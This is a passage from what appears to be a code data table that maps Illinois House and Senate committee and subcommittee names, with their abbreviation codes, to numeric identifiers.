Assurance", "HCDA-CBAI"): "1108", ("Broadband Infrastructure, Subcommit", "HTEL-HBBI"): "121", ("Business & Occupational Licenses", "HBOL"): "24", ("Business and Industry Regulations S", "HLBR-LBIR"): "1109", ("Business Growth & Incentives", "HBGI"): "122", ("Business Growth & Incentives", "HSBG"): "122", ("Business Incentives for Local Comm.", "HBIL"): "124", ("Business Licenses Subcommittee", "HBOL-BLIC"): "125", ("Business Licenses Subcommittee", "HBOL-BOBL"): "125", ("Business Licenses Subcommittee", "HBOL-BULI"): "125", ("Business Occupational Licenses", "HBOL"): "24", ("Business Regulation", "HBOL-BREG"): "128", ("Campaign Finance Subcommittee", "HELE-CAFI"): "129", ("Cemeteries Subcommittee", "HJUA-CEME"): "130", ("Charter Schools Subcommittee", "HELM-CHAR"): "33", ("Charter Schools", "HELM-CHAR"): "33", ("Child Care Access & Early Childhood", "HCEC"): "1105", ("Child Support Enforcement", "HCSE"): "131", ("Childhood and Young Adult Onset Sub", "HMEH-CHIL"): "132", ("Cities & Villages", "HCIV"): "133", ("Civil Procedure Subcommittee", "HJUA-CIPS"): "134", ("Civil Procedure Subcommittee", "HJUA-JCIP"): "134", ("Civil Process Subcommittee", "HJUA-HCIV"): "134", ("Civil Process and Procedures Subcom", "HJUA-CIPP"): "134", ("Climate Change Subcommittee", "HENE-CCHA"): "137", ("Coal Finance Subcommittee", "HREF-HCOA"): "138", ("Com. Oversight Medicaid Mang. Care", "SOMM"): "30", ("Comm. On State & Pension Fund Inves", "SSPF"): "2274", ("Commerce & Business Development", "HCBD"): "140", ("Commerce & Economic Development", "SCED"): "64", ("Commerce and Economic Development", "SCED"): "64", ("Commerce and Innovation Subcommitte", "HLBR-LCIS"): "1110", ("Commerce", "SCOM"): "139", ("Commercial Law Subcommittee", "HJUA-COLS"): "141", ("Commercial Law Subcommittee", "HJUA-JCLS"): "141", ("Committee of the Whole", "HCWL"): "34", ("Committee of the Whole", "SCWL"): "35", ("Committee on Housing", "SSCH"): "157", ("Committee on Pension Investments", "SSCP"): "142", ("Committee on Restorative Justice", "SCRJ"): "143", ("Committee on Supplier Diversity", "SCSD"): "648", ("Community Affairs", "SHCA-SSCA"): "144", ("Community Care Program Subcommittee", "HAGI-CARE"): "145", ("Community College Access & Afford.", "HCCA"): "146", ("Compensation Subcommittee", "HCOT-COMP"): "147", ("Computer Technology", "HCOM"): "148", ("Conflicts of Interest", "HCFI"): "149", ("Consolidated Subcommittee", "HCOT-CONS"): "150", ("Consolidation & Tax Subcommittee", "HCOT-CTCT"): "150", ("Constitutional Law Subcommittee", "HJUA-JCDL"): "1111", ("Constitutionality and Redundancy", "HJUB-CORE"): "151", ("Construction Industry & Code Enforc", "HCIC"): "152", ("Consumer Health Subcommittee", "HCON-COHE"): "153", ("Consumer Protection", "HCON"): "154", ("Consumer Protection", "SCCP"): "155", ("Consumer Regulation", "HCON-HCRG"): "156", ("Consumer Regulation, Subcomittee", "HCON-HCOR"): "156", ("Consumer Review Subcommittee", "HCON-CRVW"): "158", ("Corrections Subcommittee", "HJUB-CORR"): "159", ("Cost Analysis Subcommittee", "HAPI-COST"): "160", ("Cost Benefit Analysis", "HCBA"): "161", ("Counties & Townships", "HCOT"): "162", ("Credit & Affordable Housing", "SHCA-SCAH"): "41", ("Crim. Law Subcom Enhance/Redundancy", "SCCL-SCER"): "163", ("Criminal Admin and Enforcement", "HJUC-CRIM"): "164", ("Criminal Justice Reform Subcommitte", "HREJ-HCJR"): "165", ("Criminal Law Subcomm. Const. Review", "SCCL-SCCR"): "167", ("Criminal Law Subcomm. on Firearms", "SCCL-SCCF"): "168", ("Criminal Law", "SCCL"): "166", ("Criminal Procedure, Penalties", "HJUA-CPPS"): "169", ("Cybersecurity, Data Analytics, & IT", "HCDA"): "170", ("DCFS Oversight", "HDCF"): "171", ("Deficit Reduction", "SCDR"): "172", ("Develop Disabilities Mental Illness", "HDMI"): "173", ("Disability Services", "HDIS"): "174", ("Disparities in Educational Achievem", "HDEA"): "175", ("Distributed Ledgers & Cryptocurrenc", "HCDA-CDLC"): "214", ("Distributed Ledgers & Cryptocurrenc", "HCDA-DLCS"): "214", ("Dog & Cat Pop. Control Adv. Comm.", "DCPC"): "176", ("Domestic Relations Law Subcommittee", "HJUA-DRLS"): "177", ("Drivers Education & Safety", "HDES"): "178", ("Drugs Subcommittee", "HJUB-DRGS"): "179", ("E & E Subcomm. on Chem. & Coal", "SENV-SECC"): "180", ("Economic Development & Housing", "HECD"): "47", ("Economic Development", "HECD"): "47", ("Economic Growth and Mod. Sub.", "HECD-HEGM"): "181", ("Economic Justice & Equity", "HEJE"): "182", ("Economic Opportunity", "HECO"): "183", ("Economic Opportunity & Equity", "HECO"): "183", ("Education Policy & Procedure", "SESE-SEPP"): "185", ("Education Reform", "EREF"): "186", ("Education", "SESE"): "184", ("Election Administration Subcommitte", "HELE-ELEC"): "187", ("Elections & Campaign Finance", "HELE"): "189", ("Elections & Campaign Reform", "HECR"): "52", ("Elections and Campaign Reform", "HECR"): "52", ("Elections", "SELC"): "188", ("Electric Deregulation, Subcommittee", "HENE-ELEC"): "190", ("Electric Generation & Commerce", "HEGC"): "191", ("Electric Utility Oversight", "HEUD"): "192", ("Electric and Natural Gas, Subcom", "HPUB-ELEC"): "193", ("Elem Sec Ed: Adm., Lic. & Charter", "HELO"): "56", ("Elem Sec Ed Charter School Policy", "HELC"): "53", ("Elem Sec Ed School Curricu Policies", "HELM"): "54", ("Elem Sec Ed: Charter School Policy", "HELC"): "53", ("Elem Sec Ed: Licensing Oversight", "HELO"): "56", ("Elem Sec Ed: Licensing, Admin.", "HELO"): "56", ("Elem Sec Ed: School Curric Policies", "HELM"): "54", ("Elementary & Secondary Education", "HELM"): "54", ("End of Career Compensation Sub", "HPPN-ENCC"): "195", ("Energy & Environment", "HENG"): "196", ("Energy Management, Subcommittee", "HHED-ENER"): "197", ("Energy Resources Subcommittee", "HENE-ENRE"): "911", ("Energy and Public Utilities", "SENE"): "59", ("Energy", "HENG"): "196", ("Energy", "SENE"): "59", ("Enhancement of Criminal Penalties", "HJUB-EOCP"): "198", ("Enterprise Zone Extensions", "SCEZ"): "199", ("Environment & Energy", "HENE"): "62", ("Environment & Energy", "SENV"): "49", ("Environment Subcommittee", "HENE-ENVI"): "200", ("Environment and Conservation", "SNVR"): "63", ("Environment and Energy", "HENE"): "62", ("Environment and Energy", "SENV"): "49", ("Environment", "HENE"): "62", ("Environment", "SNVR"): "63", ("Environmental Health", "HENH"): "201", ("Environmental Justice Subcommittee", "HENG-EJUS"): "1112", ("Environmental Quality Subcommittee", "HENE-SEQU"): "202", ("Environmental Regulations Subcommit", "HENE-ENRE"): "61", ("Ethanol Production Oversight", "HEPO"): "203", ("Ex-Offender and Reentry Subcommitte", "HAPP-EXOF"): "204", ("Exec. Subcomm. Fin/ Lic Activities", "SEXC-ESLA"): "205", ("Exec. Subcommittee on Amendments", "SEXC-EXSA"): "207", ("Exec. Subcommittee on Education", "SEXC-ESOE"): "208", ("Exec. Subcommittee on Tobacco", "SEXC-ESOT"): "209", ("Exec.Subcommitte on Gaming", "SEXC-ESOG"): "210", ("Executive Appointments", "SEXA"): "213", ("Executive Subcommittee on Amendment", "SEXC-SXAM"): "207", ("Executive Subcommittee on Education", "SEXC-SXED"): "73", ("Executive Subcommittee on Revenue", "SEXC-SXRV"): "215", ("Executive", "HEXC"): "211", ("Executive", "SEXC"): "212", ("Expansion of Sex Offenses and Sex", "HJUB-ESOR"): "216", ("Facilities Subcommittee", "HHSV-FACI"): "217", ("Facilities Subcommittee", "HHSV-HFAC"): "217", ("Facilities Subcommittee", "HHSV-HFHS"): "217", ("Facilities and Institutions Subcomm", "HHSV-FAIN"): "217", ("Family Law Subcommittee", "HJUA-JFAL"): "1113", ("Fee For Service Initiatives", "FFSI"): "220", ("Fee-For-Service Initiatives", "HFEE"): "220", ("Fin Inst Subcommittee on Amendments", "SFIC-FINA"): "222", ("Fin. Inst. Predatory Lending", "SFIC-FIPL"): "223", ("Fin. Inst. Subcomm. Special Issues", "SFIC-FISI"): "224", ("Finance Subcommittee", "HREF-FINA"): "225", ("Finance Subcommittee", "HREF-HREF"): "225", ("Finance", "HREF-FINC"): "225", ("Financial Institutions", "HFIN"): "228", ("Financial Institutions", "SFIC"): "229", ("Fire & Emergency Services", "HFES"): "230", ("Fire Protection", "HFIR"): "231", ("Fire Service Subcommittee", "HFES-FISE"): "232", ("Firearms Subcommittee", "HAGC-FIRE"): "233", ("Firearms Subcommittee", "HJUA-FIRE"): "234", ("Firearms and Firearm Safety Subcomm", "HJUC-FIRE"): "235", ("Firearms and Firearm Safety Subcomm", "HJUC-JCFF"): "235", ("Food Products Subcommittee", "HAGC-FOOD"): "237", ("Force Fed Birds, Subcommittee", "HAGC-HFEB"): "238", ("Foreclosure, Subcommittee of Local", "HLGV-FORE"): "239", ("Future Roads: Growth & Improvement", "HTRR-FRGI"): "240", ("Gaming Subcommittee", "HEXC-GAME"): "243", ("Gaming", "HGAM"): "241", ("Gaming", "SGAM"): "242", ("Gaming-Revenue", "SGRC"): "244", ("Gang Crimes, Judicary II Subcommitt", "HJUB-HGCR"): "245", ("General Law Subcommittee", "HJUA-GLAW"): "246", ("General Law Subcommittee", "HJUA-HLAW"): "246", ("Gov. Accountability & Streamlining", "HSGA-GOVE"): "248", ("Government Accountability/Pensions", "SGAP"): "1101", ("Government Consolidation & Modern", "HGCM"): "249", ("Government Consolidation Analysis", "HGCM-GCAC"): "279", ("Government Operations Subcommittee", "HJUA-GOOP"): "250", ("Government Process Subcommittee", "HSGA-HGPR"): "251", ("Government Reform", "SGRM"): "252", ("Government Transparency", "HGOT"): "253", ("Govt. Accountability and Streamlini", "HSGA-GOAS"): "248", ("Growth, Reform & Fairness Subcommit", "HREF-GRFS"): "255", ("HHS-BDD Subcommittee", "SHHS-SHHB"): "256", ("HS Medicaid Subcommittee", "HHSV-MEDI"): "257", ("Health & Healthcare Disparities", "HHCD"): "258", ("Health & Human Services Health Care", "SHHS-SHHH"): "259", ("Health & Human Services", "SHHS"): "81", ("Health Care Availability Access", "HHCA"): "82", ("Health Care Availability & Access", "HHCA"): "82", ("Health Care Licenses", "HHCL"): "260", ("Health Exchange Marketplace Sub", "HINS-HEMS"): "261", ("Health Exchanges Subcommittee", "HINS-EXCH"): "261", ("Health Insurance Subcommittee", "HINS-IHLT"): "1114", ("Healthy Illinois Plan", "HHCA-HHIP"): "263", ("Higher Ed Special Issues Sub", "HHED-HESI"): "264", ("Higher Ed. Subcommittee-Comm. Coll.", "SCHE-HECC"): "265", ("Higher Education Analysis Subcommit", "HHED-HEAS"): "268", ("Higher Education Issues Subcommitte", "HHED-HEDI"): "264", ("Higher Education", "HHED"): "266", ("Higher Education", "SCHE"): "267", ("Highways & Transit Subcommittee", "HTRR-HITR"): "270", ("Homeland Security & Emergency Prepa", "HSEP"): "271", ("Hospital Closures, Subcommittee of", "HAPH-HOSC"): "272", ("House Budget Oversight Panel", "HBOP"): "273", ("Housing", "HOUS"): "274", ("Housing & Community Affairs", "SHCA"): "89", ("Housing & Urban Development", "HHUD"): "90", ("Housing and Community Affairs", "SHCA"): "89", ("Housing and Property Subcommittee", "HJUA-HOPO"): "275", ("Housing and Urban Development", "HHUD"): "90", ("Housing, Special Committee On", "SSCH"): "280", ("Human Services", "HHSV"): "276", ("Human Services", "SHHS"): "81", ("Hunting Subcommittee", "HAGC-HUNT"): "277", ("IL State Toll Highway Authority", "TOLL"): "278", ("Income Tax Subcommittee", "HREF-HTAX"): "93", ("Income Tax Subcommittee", "HREF-INTX"): "93", ("Income Tax Subcommittee", "HREF-ITAX"): "93", ("Income Tax Subcommittee", "HREF-RITA"): "93", ("Income Tax", "HREF-ITAX"): "93", ("Income Tax, Subcommittee on", "HREV-ITAX"): "93", ("Income Tax, Subcommittee on", "HREV-RITX"): "93", ("Informed Consent Subcommitee", "HHSV-INFO"): "284", ("Informed Consent Subcommittee", "HHSV-HICO"): "284", ("Informed Consent Subcommittee", "HHSV-INCO"): "284", ("Informed Consent Subcommittee", "HHSV-HCON"): "284", ("Infrastructure", "HIND"): "286", ("Ins. Health Care Cost Drivers, Sub", "HINS-COST"): "287", ("Ins. Subcommittee on Mandate Review", "SINS-ISMR"): "288", ("Insurance & Pensions", "SINS"): "95", ("Insurance", "HINS"): "94", ("Insurance", "SINS"): "95", ("Insurance: Health & Life", "HINS"): "94", ("Insurance: Property & Casualty", "HIPC"): "289", ("Intermodal Infrastructure", "HINI"): "290", ("International Trade & Commerce", "HITC"): "291", ("Job Growth, Preservation and Traini", "HLBR-LJGP"): "1115", ("Joint Comm. on Government Reform", "HJGR"): "292", ("Joint Comm. on Government Reform", "SCGR"): "293", ("Joint Committee on MPEA", "SMPE"): "294", ("Joint Committee on Pier", "PIER"): "295", ("Joint Criminal Justice Reform Comm.", "HCJR"): "296", ("Joint Criminal Justice Reform Comm.", "SCJR"): "297", ("Joint Task Force I & R", "JTIR"): "298", ("Jt. Task Force -- Rural Healthcare", "TFRH"): "299", ("Jud. Criminal - Special Issues", "SJCR-SJSI"): "300", ("Judicial Process Subcommittee", "HJUA-JUDP"): "301", ("Judiciary - Civil", "HJUA"): "7", ("Judiciary - Criminal", "HJUC"): "302", ("Judiciary Civil Law", "SJUD"): "8", ("Judiciary Criminal Law", "SJCR"): "303", ("Judiciary I - Civil Law", "HJUA"): "7", ("Judiciary II - Criminal Law", "HJUB"): "304", ("Judiciary", "HJUA"): "7", ("Judiciary", "SJUD"): "8", ("Justice System Subcommittee", "HMEH-JUST"): "305", ("Juvenile Justice & System-Involved", "HJJS"): "306", ("Juvenile Justice Reform", "HJJR"): "307", ("Juvenile Justice and System Involve", "HJUC-JUVE"): "308", ("KidCare Subcommittee", "HHSV-HKID"): "309", ("Labor & Commerce Committee", "HLBR"): "55", ("Labor & Commerce", "SCED"): "64", ("Labor & Commerce", "HLBR"): "55", ("Labor and Commerce", "SLAB"): "71", ("Labor", "HLBR"): "55", ("Labor", "SLAB"): "71", ("LaborSubcommittee on Special Issues", "SLAB-SLSI"): "19", ("Land and Solid Waste, Subcom", "HENE-LAND"): "310", ("Least Cost Power Procurement", "HPOW"): "311", ("Legislative Petitions", "SCLP"): "312", ("Legislative Review, Subcommittee", "HEXC-LEGI"): "313", ("Licensed Activities and Pensions", "SLIC"): "20", ("Licensed Activities", "SLIC"): "20", ("Licenses and Registration, Subcommi", "HTRN-LICN"): "22", ("Licenses, Subcommittee on", "HTRN-LICN"): "22", ("Licensure Review Subcommittee", "HBOL-LICR"): "314", ("Licensure Review", "HHCL-LICR"): "23", ("Licensures Review Subcommittee", "HHCL-LICE"): "23", ("Local Government Administration Sub", "HCOT-LOCG"): "317", ("Local Government Consolidation Sub", "HCOT-CTLG"): "318", ("Local Government Efficiency Subcomm", "HCOT-HLGE"): "319", ("Local Government Subcommittee", "HCOT-CTLC"): "1106", ("Local Government Subcommittee", "HCIV-CLOC"): "27", ("Local Government Subcommittee", "HCIV-HLOG"): "27", ("Local Government Subcommittee", "HCIV-LOGO"): "27", ("Local Government Subcommittee", "HCIV-LOGV"): "27", ("Local Government", "HLGV"): "315", ("Local Government", "SLGV"): "316", ("Local Retirement System Subcommitte", "HPPN-PLRS"): "1116", ("Long Term Care Subcommittee", "HINS-LTCI"): "321", ("Managing Sex Offender Issues, Subco", "HJUB-MSOI"): "322", ("Mandate Subcommittee", "HELM-MANS"): "323", ("Mandates Subcommittee", "SINS-SINM"): "28", ("Mandates of the Elementary & Sec Ed", "HELM-MAND"): "323", ("Mandatory Insurance, Subcommittee", "HINS-MAND"): "325", ("Mass Transit Compliance, Subcom", "HTRN-MASS"): "327", ("Mass Transit for Northeastern IL", "SMTN"): "328", ("Mass Transit", "HMAS"): "326", ("Med. Discipline/Ins./MalpracticeRef", "SJUD-SMED"): "329", ("Medicaid Managed Care T F", "MMTF"): "330", ("Medicaid Reform Committee", "HSMR"): "331", ("Medicaid Reform Subcommittee", "HHCA-MEDI"): "332", ("Medicaid Reform, Family & Children", "HMRF"): "333", ("Medicaid Subcommittee", "HAPH-MEDI"): "334", ("Medicaid Subcommittee", "HHSV-HMED"): "1117", ("Mental Health", "HMEH"): "335", ("Methamphetamine, Judiciary II Subco", "HJUB-METH"): "336", ("Mineral Rights, Judiciary I-Civil L", "HJUA-HJMR"): "337", ("Mineral and Surface Rights Issues", "HJUA-MSRI"): "338", ("Minority Procurement", "HSGA-MPRO"): "339", ("Minority/Disadvantage Analysis Subc", "HLBR-LMDA"): "1118", ("Mobile Home T.F.", "MHTF"): "340", ("Mobile Home T.F.", "SMHT"): "340", ("Motor Fuel Analysis Subcommittee", "HTRR-MOFA"): "342", ("Motorcycles/Trucking, Subcom", "HTRN-MOTO"): "343", ("Museums, Arts, & Cultural Enhanceme", "HMAC"): "344", ("Negotiations Subcommittee", "HAGC-NEGO"): "345", ("Negotiations Subcommittee", "HHCL-HNEG"): "346", ("Negotiations Subcommittee", "HHCL-NEGO"): "346", ("New State Programs or Expenditures", "HSGA-NEWS"): "347", ("No Child Left Behind Act of 2001", "SESE-SECL"): "36", ("Oversight Medicaid Mang. Care", "SOMM"): "30", ("Oversight Medicaid Mang. Care, Spec", "SOMM"): "44", ("Paratransit, Subcommittee on", "HMAS-PARA"): "349", ("Pay Day Loans, Subcommittee", "HFIN-PDAY"): "350", ("Payday and Title Loans, Subcommitte", "HFIN-LOAN"): "351", ("Penalty Enhancements and Enlargemen", "HJUB-HPEG"): "352", ("Pension Benefits Review", "SPAI-SPBR"): "0", ("Pension Fund Management Procurement", "PFMP"): "353", ("Pension Funds Management", "HPFM"): "354", ("Pension Investments", "PENI"): "355", ("Pensions & Investments", "SPAI"): "39", ("Pensions Subcommittee", "SINS-SINP"): "356", ("Pensions and Investments", "SPAI"): "39", ("Personnel & Pensions", "HPPN"): "357", ("Personnel Code Subcommittee", "HPPN-PPPC"): "1120", ("Petroleum Regulation Subcommittee", "HAGC-PETR"): "365", ("Police & First Responders", "HPFR"): "358", ("Police and Fire Pension Reform", "HPPN-PFPR"): "359", ("Practice Acts Subcommittee", "HHCL-HPAC"): "360", ("Prescription Drug Affordability", "HPDA"): "1121", ("Prevailing Wage Subcommittee", "HLBR-WAGE"): "361", ("Prison Reform", "HPRF"): "362", ("Procedures Subcommittee", "HSGA-PROC"): "363", ("Procurement", "SCOP"): "364", ("Property Tax Reform", "SREV-SRPT"): "43", ("Property Tax Subcommittee", "HREF-HPRP"): "42", ("Property Tax Subcommittee", "HREF-PROP"): "42", ("Property Tax Subcommittee", "HREF-PTAX"): "42", ("Property Tax Subcommittee", "HREF-RPTA"): "42", ("Property Tax", "HREF-PTAX"): "42", ("Property Tax, Subcommittee on", "HREV-PTAX"): "42", ("Property Tax, Subcommittee on", "HREV-RPTX"): "42", ("Pub. High. Ed. Adm. Cost. Tui. Fees", "SCHE-SPHE"): "368", ("Public Benefits Subcommittee", "HHSV-HPBE"): "46", ("Public Benefits Subcommittee", "HHSV-PUBL"): "46", ("Public Benefits Subcommittee", "HHSV-PUBT"): "46", ("Public Benefits Subcommittee", "HHSV-HPBH"): "46", ("Public Health Subcommittee", "HCON-PUHE"): "371", ("Public Health", "SPHL"): "370", ("Public Pension Investments", "SPPI"): "372", ("Public Pensions & State Investments", "SCPP"): "373", ("Public Policy & Accountability", "HPPA"): "374", ("Public Private Partnerships", "HPPP"): "375", ("Public Safety", "HJUB-SAFE"): "376", ("Public Safety: Police & Fire Commit", "HSPF"): "377", ("Public Utilities Cellular Service", "HPUB-CELL"): "379", ("Public Utilities Subcommittee", "HPUB-PUBL"): "380", ("Public Utilities", "HPUB"): "378", ("Qualifications Challenge Committee", "HQCC"): "381", ("Railroad Industry", "HRRI"): "382", ("Railroad Safety", "HRRS"): "383", ("Railroad and Air Transportation Sub", "HTRR-RAIL"): "384", ("Railroads, Ports and Aviation Subco", "HTRR-RPAV"): "385", ("Railroads, Subcommittee on", "HTRN-RAIL"): "386", ("Rapid Growth District & Special Ed.", "HELM-HRGD"): "387", ("Real & Personal Property Law Subcom", "HJUA-RPPL"): "388", ("Real Estate, Prop. Probate & Trust", "HJUA-HRPP"): "389", ("Real Estate, Property, Probate, Tru", "HJUA-RPPT"): "390", ("Red Light Camera Subcommittee", "HVES-REDL"): "391", ("Red Light", "HVES-HRED"): "391", ("Redistricting", "DIST"): "393", ("Redistricting", "SRED"): "394", ("Regional Equity, Mass Transit Subco", "HMAS-REGL"): "395", ("Registration & Regulation", "HREG"): "396", ("Regulatory Matters Subcommittee", "HPUB-REGU"): "410", ("Renewable Energy & Sustainability", "HRES"): "398", ("Renewable Energy", "HRNE"): "397", ("Residential Renters Rights & Respon", "HHUD-RENT"): "399", ("Residential Services for Persons", "HFEE-RSPM"): "400", ("Resources and Management Subcommitt", "HENG-RESO"): "401", ("Restorative Justice", "HREJ"): "402", ("Revenue & Finance", "HREF"): "403", ("Revenue & Spending Subcommittee", "HCOT-SPEN"): "406", ("Revenue Subcomm. on Special Issues", "SREV-SRSI"): "65", ("Revenue Subcommittee on Amendments", "SREV-SRAM"): "66", ("Revenue Subcommittee on Prop. Taxes", "SREV-SRPT"): "43", ("Revenue Subcommittee-Amendments", "SREV-SRAM"): "66", ("Revenue", "HREV"): "403", ("Revenue", "SREV"): "404", ("Review Subcommittee", "SINS-SINR"): "407", ("Revnue Subcommittee Special Issues", "SREV-SRSI"): "65", ("Roads, Bridges & Traffic Safety", "HTRN-ROAD"): "67", ("Roads, Bridges and Traffic Safety", "HTRN-ROAD"): "67", ("Rules", "HRUL"): "408", ("Rules", "SCOA"): "21", ("Rural Economic Development", "HRED"): "409", ("Sales & Other Tax, Subcommittee on", "HREV-RSOT"): "70", ("Sales and Other Taxes Subcommittee", "HREF-HSLE"): "70", ("Sales and Other Taxes Subcommittee", "HREF-SALE"): "70", ("Sales and Other Taxes Subcommittee", "HREF-STAX"): "70", ("Sales and Other Taxes", "HREF-STAX"): "70", ("Sales and Other Taxes, Subcommittee", "HREV-STAX"): "70", ("Sales, Amusement & Other Taxes", "HREF-RSAT"): "70", ("Scholarship Tax Credit Oversight", "HREF-STCO"): "72", ("School Buses Subcommittee", "HVES-BUSE"): "412", ("School Code Waivers, Subcommittee", "HELM-SCWA"): "413", ("School Transportation", "HELM-STRN"): "414", ("Science, Technology, Engineering,", "HELM-STEM"): "415", ("Select Committee on Discipline", "HSCD"): "416", ("Sen. Comm. Whole", "SCWL"): "35", ("Sen. T.F. on IL Alcoholic Bev. La", "SIAB"): "417", ("Senate Committee of the Whole", "SCWL"): "35", ("Senate Education Funding Reform", "SEFR"): "418", ("Senior and Veterans Housing Sustain", "HECD-SVHS"): "419", ("Sentencing, Penalties and Criminal", "HJUC-SPCP"): "420", ("Sentencing, Penalties, and Criminal", "HJUC-CPCP"): "421", ("Sex Crime Subcommittee", "HJUB-SEXC"): "422", ("Sex Offenses Subcommittee", "HJUA-SEOF"): "423", ("Sex Offenses and Sex Offender Regis", "HJUC-SORE"): "424", ("Sex Offenses and Sex Offender Regis", "HJUC-SOSO"): "424", ("Single Family Homeownership Stabili", "HECD-SFHS"): "426", ("Sm Bus Empowerment Wkforce Develop", "HSBE"): "76", ("Small Business Empowerment & Workfo", "HSBE"): "76", ("Smart Growth & Regional Planning", "HSGR"): "427", ("Social Change Subcommittee", "HREJ-SOCH"): "428", ("Solid Waste Subcommittee", "HENE-SSSW"): "429", ("Solid Waste", "HENE-SWAS"): "429", ("Spec Committee on Education Reform", "SCER"): "431", ("Spec.Comm. on Impeachment Procedure", "SITP"): "433", ("Special Bills Subcommittee", "HSGA-HSPB"): "434", ("Special Budget Subcommittee", "HAPG-SPBU"): "435", ("Special Comm. on Medicaid Reform", "SCMR"): "436", ("Special Comm. on Watercraft Safety", "SCWS"): "437", ("Special Investigating Committee", "SPIC"): "438", ("Special Investigative Committee", "HSIC"): "439", ("Special Issues Subcommittee", "HAPE-APES"): "1103", ("Special Issues Subcommittee", "HELM-HSPI"): "440", ("Special Issues Subcommittee", "HELM-ISSU"): "440", ("Special Issues Subcommittee", "HELM-SPEC"): "440", ("SPECIAL Issues Subcommittee", "HELM-SPEC"): "440", ("Special Issues Subcommittee", "HELO-ISSU"): "443", ("Special Issues- Subcommittee", "HVES-TVSI"): "458", ("Special Issues Subcommittee", "HELO-ESSI"): "443", ("Special Issues Subcommittee", "HELM-ESSI"): "440", ("Special Issues Subcommittee", "HVES-TSPI"): "458", ("Special License Plate Subcomittee", "HSGA-LICN"): "444", ("Special License Plates Subcommittee", "HVES-SLPD"): "445", ("Special License Plates, Subcommitte", "HSGA-HSLP"): "446", ("Special Matters Subcommittee", "HPUB-MATT"): "447", ("Special Matters Subcommittee", "HPUB-SPMA"): "447", ("Special Needs Services", "HSNS"): "449", ("Special Subcommittee", "HSGA-SPEC"): "450", ("Special Subcommittee", "HINS-ISPC"): "1128", ("Special Vehicle License Plates, Sub", "HSGA-VEHI"): "451", ("Speed Limits Subcommittee", "HVES-SPED"): "452", ("St Govt Subcomm Spec Issues/Amends", "SGOA-SGIA"): "453", ("St. Govt Subcommittee on Amendments", "SGOA-SGSA"): "921", ("St. Govt Subcommittee on Finance", "SGOA-SGSF"): "455", ("State & Pension Fund Invest, Spec.", "SSPF"): "461", ("State Government & Veterans Affairs", "SGOA"): "3", ("State Government Administration", "HSGA"): "456", ("State Government Review", "SGOA-SSGR"): "457", ("State Government Subcommittee", "HSGA-SGAS"): "1000", ("State Government", "SGOA"): "3", ("State Retirement System Subcommitte", "HPPN-PSRS"): "1129", ("Sub Com State Univ Civil Serv Syst.", "SCHE-HECS"): "459", ("Sub Com on CA Affecting the Jud", "SJUD-SJCA"): "84", ("Sub on Community Youth Employment", "SHHS-CYEM"): "460", ("Sub on Constitutional Amendments", "SEXC-SECA"): "86", ("Sub on Constitutional Amendments", "SEXC-SSCA"): "86", ("Sub on EPA 111(d) Requirements", "SNVR-SECE"): "462", ("Sub on Economic Development", "SGOA-SOED"): "463", ("Sub on Emerging Tech & Spec.Issues", "SCOM-SCES"): "464", ("Sub on Governmental Operations", "SEXC-SEGO"): "32", ("Sub on Governmental Operations", "SEXC-SSGO"): "32", ("Sub on Hunting and Trapping", "SAGR-SAHT"): "466", ("Sub on Ins Mandates & Ins Issues", "SINS-SIMI"): "467", ("Sub on Issues Relating to DCFS", "SHHS-SHDC"): "468", ("Sub on Issues Relating to DCFS", "SHHS-SSDC"): "468", ("Sub on Mental Health Issues", "SEXC-SEMH"): "470", ("Sub on Research & Academic Medicine", "SCHE-HEAM"): "471", ("Sub on Transportation Innovation", "STRN-STRI"): "472", ("Sub. Comm on Statutes of Limitation", "SCCL-SCSL"): "473", ("Sub. Confined Animal Feeding Ops.", "SAGR-SCFO"): "474", ("Sub. on Public Notif.Requirements", "SLGV-SPNR"): "570", ("Sub. On The Const.and Redist Issues", "SJUD-SCRI"): "475", ("Sub. Public Higher Edu. Exec. Comp.", "SCHE-SPHC"): "476", ("Sub. on Auto Insurance Rates", "SINS-SIAR"): "477", ("Sub. on Compensation and Benefits", "SGOA-SCAB"): "511", ("Sub. on Consequences of Fed.Policy", "SHHS-SHFP"): "478", ("Sub. on Constitutional Amendments", "SEXC-EXCA"): "86", ("Sub. on Energy and Labor Policy", "SEXC-SELP"): "480", ("Sub. on Financial Regulation", "SFIC-SFSR"): "481", ("Sub. on Generation, Util, & Telecom", "SENE-SEGU"): "482", ("Sub. on Utility Rate Regulations", "SENE-SEUR"): "912", ("Sub. on Interscholastic Athletics", "SESE-SEIA"): "483", ("Sub. on Issues Impacting IL Youth", "SHHS-SIIY"): "484", ("Sub. on Police Professionalism", "SEXC-SCPP"): "485", ("Sub. on Water Related Issue", "SNVR-SEWI"): "486", ("Subcommittee on Business Entities", "SJUD-SCBE"): "497", ("Subcommittee on Drycleaners", "SNVR-SEDC"): "490", ("Subcommittee on Energy Innovation", "SENE-SENI"): "913", ("Sub. on Wireless Emerg Tel. Safety", "SGOA-SWET"): "487", ("Sub. on the Monetary Award Program", "SCHE-SMAP"): "488", ("Sub.Ins.Mandates & Special Issues", "SINS-SIIM"): "489", ("Sub.on Ins.Madates & Special Issues", "SINS-SIMS"): "489", ("Subcom Competitiveness & Innovation", "SCOM-SCCI"): "96", ("Subcomm Comm. Affairs", "SHCA-SCAF"): "909", ("Subcomm on Civil Process Procedure", "SJUD-SJPP"): "491", ("Subcomm on Health Care Licensing", "SLIC-SLHL"): "492", ("Subcomm on Pension Enhancements", "SPAI-SPPE"): "1", ("Subcomm on Property and Environment", "SJUD-SJPN"): "493", ("Subcomm. Global Warming & Energy", "SENV-SGWE"): "495", ("Subcomm. Waterfront Devel./Preserv.", "SENV-SEWD"): "496", ("Subcomm. on Civil Process&Procedure", "SJUD-SJCP"): "491", ("Subcomm. on Fertilizers & Chemicals", "SAGR-SAFC"): "4", ("Subcomm. on Property & Environment", "SJUD-SJPE"): "493", ("Subcomm. on Prscriptive Authority", "SLIC-SLPA"): "498", ("Subcomm.Medicaid &Provider Rate Ref", "SHHS-SMPR"): "500", ("Subcomm.on Containing Costs/Tuition", "SAPB-SCCT"): "501", ("Subcom. on Pension Consolidation", "SLIC-SLPC"): "510", ("Subcomm.on Pension Enhancements", "SPAI-SPBE"): "1", ("Subcommitte Pension Benefit Review", "SPAI-SPBR"): "0", ("Subcommittee - Nursing Home Care", "SPHL-SPNH"): "502", ("Subcommittee Legis.Tuition Waivers", "SEXC-SXTW"): "503", ("Subcommittee Traffic Safety", "STRN-STTS"): "504", ("Subcommittee on Airports", "STRN-STRA"): "901", ("Subcommittee on Amendments", "SCCP-SCPA"): "12", ("Subcommittee on Amendments", "SJUD-SJDA"): "505", ("Subcommittee on Amendments", "SJUD-SJOA"): "505", 